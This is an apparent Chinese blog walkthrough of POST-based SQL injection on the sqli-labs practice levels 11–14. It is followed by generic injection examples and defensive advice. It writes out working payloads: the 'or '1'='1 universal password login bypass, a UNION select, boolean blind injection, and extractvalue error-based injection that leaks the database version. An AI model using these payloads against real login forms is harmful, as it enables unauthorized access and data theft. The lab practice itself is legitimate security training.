SQL-Post注入

Post注入

  • 在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,
    提交到服务器后服务器再进行验证。这就是一次post的过程的。

  • 在输入正确的用户名和密码后显示
    在这里插入图片描述

  1. 尝试会不会回显报错信息,输入admin'--+,回显报错了。在这里插入图片描述

  2. 尝试万能密码 admin’or’1’='1# ,成功登录并且回显信息。
    在这里插入图片描述

  3. 尝试联合注入

Username:1admin'union select 1,database()#
password:(任意密码)

显示数据库名了。
在这里插入图片描述

Less13

  1. Username:admin’,分析报错,程序对id进行了’)的处理。在这里插入图片描述
  2. 尝试布尔盲注,登录成功,可以利用二分法猜解。
uname=admin')and left(database(),1)>'a'#&passwd=1&submit=Submit

在这里插入图片描述

Less14

  1. 尝试盲注,登录成功。
admin"and left(database(),1)>'a'#&passwd=1&submit=Submit

在这里插入图片描述
2. 利用报错注入,成功回显数据库版本。

admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submi
 t=Submit

在这里插入图片描述

  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL 注入攻击中,POST 注入的万能语句是指可以欺骗 web 应用程序执行非授权的数据库操作的 SQL 语句。POST 注入通常是通过提交 POST 请求来触发的,攻击者在 POST 请求中添加恶意的 SQL 代码,从而欺骗应用程序执行恶意操作。 以下是一些常见的 POST 注入攻击用到的 SQL 语句: 1. SELECT * FROM users WHERE username = 'admin' AND password = 'password' OR '1'='1' 这个语句的含义是,查询表中所有用户名为 'admin' 且密码为 'password' 的数据,或者查询表中所有数据,因为 '1'='1' 恒成立,所以这个语句会返回表中的所有数据。 2. SELECT * FROM users WHERE username = 'admin' UNION SELECT 1,2,3,4,5,6 这个语句的含义是,查询表中所有用户名为 'admin' 的数据,并将其与 SELECT 语句返回的值合并,返回一个新的结果集。在这个例子中,新的结果集只包含一个值为 1,2,3,4,5,6 的行。 为了避免 SQL 注入攻击,应用程序需要进行有效的输入验证和数据过滤。具体来说,可以采取以下措施: 1. 对所有输入数据进行过滤和验证,并使用参数化查询或存储过程等安全的查询方式。 2. 最小化数据库用户的权限,并限制数据库用户的访问范围。 3. 定期更新数据库和应用程序,并及时修补已知的安全漏洞。 4. 实施访问控制和身份验证机制,以确保只有授权的用户才能访问敏感数据。 5. 监控和记录所有数据库访问,及时发现和处理异常行为。 通过采取上述措施,可以有效地缓解 SQL 注入攻击带来的安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CyberSecure

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值